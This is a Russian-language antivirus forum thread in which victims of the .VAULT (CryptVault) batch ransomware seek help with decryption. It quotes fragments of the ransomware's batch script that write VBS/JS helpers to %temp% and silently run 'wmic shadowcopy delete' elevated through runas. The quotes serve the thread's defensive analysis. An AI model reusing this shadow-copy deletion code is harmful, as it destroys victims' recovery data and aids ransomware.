Дорогие участники форума!

Наш форум переведен в режим работы "только для чтения", публикация новых тем и сообщений недоступна. Мы искренне благодарны вам за то, что были с нами, но пришло время двигаться дальше.

На данный момент приобретение лицензий ESET через наш сайт недоступно.
В качестве альтернативы предлагаем антивирусные решения PRO32 — надёжную защиту от киберугроз и высокую производительность для устройств на Windows и Android.

Приглашаем вас присоединиться к новому форуму PRO32.

Для действующих клиентов ESET мы предлагаем промокод на скидку в размере 15% — ESET15. Добавьте лицензию в корзину и примените промокод при оформлении заказа.

Перейти на PRO32
Поиск  Пользователи  Правила  Войти
Центр вирусных исследований и аналитики Шифровальщики файлов и подбор дешифраторов

файлы зашифрованы с расширением .vault , bat encoder /CryptVault

RSS
 
Дмитрий Морозов
Дмитрий Морозов
Пользователь
Сообщений: 11
Баллов: 5
Регистрация: 19.02.2015
Размещено 19.02.2015 20:27:57
Зашифровались файлы с расшрирением  doc. и так далее. Cтали с расширением, например doc.vault. При загрузке компа выскакивает окно с ссылкой на сайт злоумышленников. Плз. помогите.

Ответы

Пред. 1 ... 41 42 43 44 45 ... 49 След.
 
NickM
NickM
Пользователь
Сообщений: 257
Баллов: 205
Регистрация: 17.05.2014
Размещено 15.05.2015 13:37:47
santy,
еще вопрос. Давно ли .VAULT зачищает теневые копии?
+
еще один командный сценарий на руках имеется - не сможете Его прокомментировать? На всяк случай запоролил, хотя это было излишним: infected
 
santy
santy
Администратор
Сообщений: 17977
Баллов: 28762
Регистрация: 16.03.2010
Размещено 15.05.2015 13:49:42
достаточно давно (месяца два не меньше, если не больше). файл сейчас гляну
а что именно по этому файлу прокомментировать? отключение теневых копий? надо сравнить со старыми вариантами бат-энкодера.
немного позже.
Изменено: santy - 04.06.2016 18:04:48
[ Как создать образ автозапуска? ]
 
NickM
NickM
Пользователь
Сообщений: 257
Баллов: 205
Регистрация: 17.05.2014
Размещено 15.05.2015 13:59:02
santy,
ну не знаю. может, какой "новый"/другой подход, хотя... фиг с Ним
 
santy
santy
Администратор
Сообщений: 17977
Баллов: 28762
Регистрация: 16.03.2010
Размещено 15.05.2015 14:11:39
вот скажем в начале апреля был вариант.

Цитата
echo Set objShell = CreateObject^("Shell.Application"^) > "%temp%\win.vbs"
echo Set objWshShell = WScript.CreateObject^("WScript.Shell"^) >> "%temp%\win.vbs"
echo Set objWshProcessEnv = objWshShell.Environment^("PROCESS"^) >> "%temp%\win.vbs"
echo objShell.ShellExecute "wmic.exe", "shadowcopy delete /nointeractive", "", "runas", 0 >> "%temp%\win.vbs"
echo var cdp="%%TEMP%%\\shdw.cmd";var WshShell=CreateObject("WScript.Shell");cdp=WshShell.ExpandEnvironmentStrings(cdp);function CreateObject(fq){return new ActiveXObject(fq)}function xx(cdp){WshShell.Run(cdp,0,0);}xx(''+cdp+'');> "%temp%\shdw.js"

а это на конец марта

Цитата
echo Set objShell = CreateObject^("Shell.Application"^) > "%TEMP%\win.vbs"
echo Set objWshShell = WScript.CreateObject^("WScript.Shell"^) >> "%TEMP%\win.vbs"
echo Set objWshProcessEnv = objWshShell.Environment^("PROCESS"^) >> "%TEMP%\win.vbs"
echo objShell.ShellExecute "wmic.exe", "shadowcopy delete /nointeractive", "", "runas", 0 >> "%TEMP%\win.vbs"
[ Как создать образ автозапуска? ]
 
NickM
NickM
Пользователь
Сообщений: 257
Баллов: 205
Регистрация: 17.05.2014
Размещено 16.05.2015 10:57:16
Цитата
NickM написал:
Давно ли .VAULT зачищает теневые копии?

Цитата
santy написал:
достаточно давно (месяца два не меньше, если не больше).

Комп сейчас не под рукой чтобы наверняка проверить, а сам еще этим вопросом не задавался... а что, для выполнения <"objShell.ShellExecute "wmic.exe", "shadowcopy delete /nointeractive", "", "runas", 0"> не требуется прав администратора и/или повышение привелегий от UAC?
Изменено: NickM - 04.06.2016 18:04:48
 
santy
santy
Администратор
Сообщений: 17977
Баллов: 28762
Регистрация: 16.03.2010
Размещено 16.05.2015 12:45:40
NickM, тестирую в основном на XP, не наблюдал как этот фрагмент отрабатывает на Win7,8
[ Как создать образ автозапуска? ]
 
Максим Федоров
Максим Федоров
Пользователь
Сообщений: 1
Регистрация: 19.05.2015
Размещено 19.05.2015 10:29:47
Доброго времени суток.
Тоже прошелся vault по машине - зашифровал данные...
Остались следующие файлы
vault.txt
vault.key
confirmation.key
в папке gnupg\
pubring.gpg
random_seed.
trustdb.gpg
еще остался батник который все это натворил Se5e.bat (в нем присутствует строка на на создание SECRING.QPQ с последующим переименованием в secring.gpg - самого файла нет).
Есть ли надежда на дешифровку?  
Отправляю архив (пароль - infected )
 
santy
santy
Администратор
Сообщений: 17977
Баллов: 28762
Регистрация: 16.03.2010
Размещено 19.05.2015 12:57:24
МАксим,
без secring.gpg расшифровка документов на нашей стороне невозможна.
ВАУЛТ. что делать?
http://chklst.ru/forum/discussion/1481/vault-chto-delat
когда произошло шифрование?

так же
проверьте наличие теневых копий,
возможно шифратору не удалось отключить теневые копии
Изменено: santy - 04.06.2016 18:05:31
[ Как создать образ автозапуска? ]
 
Денис Михайлов
Денис Михайлов
Пользователь
Сообщений: 1
Регистрация: 19.05.2015
Размещено 19.05.2015 13:07:13
Здравствуйте. Позвольте присоединиться к пострадавшим от шифровальщика.
secring.gpg нулевого размера.
Есть pubring.gpg и trustdb.gpg ненулевого размера.
В %temp% лежат файлы 7fbf4b71_VAULT.KEY, CONFIRMATION.KEY, VAULT.KEY
Образ автозапуска тут
 
santy
santy
Администратор
Сообщений: 17977
Баллов: 28762
Регистрация: 16.03.2010
Размещено 19.05.2015 13:22:53
Денис,

Цитата
без secring.gpg расшифровка документов на нашей стороне невозможна.
ВАУЛТ. что делать?
http://chklst.ru/forum/discussion/1481/vault-chto-delat
когда произошло шифрование?

так же
проверьте наличие теневых копий,
возможно шифратору не удалось отключить теневые копии

+
проверьте, чтобы в автозапуске системы не было запчастей от ВАУЛТ, в частности js
который может запустить повторное шифрование.
[ Как создать образ автозапуска? ]
 
Пред. 1 ... 41 42 43 44 45 ... 49 След.
Читают тему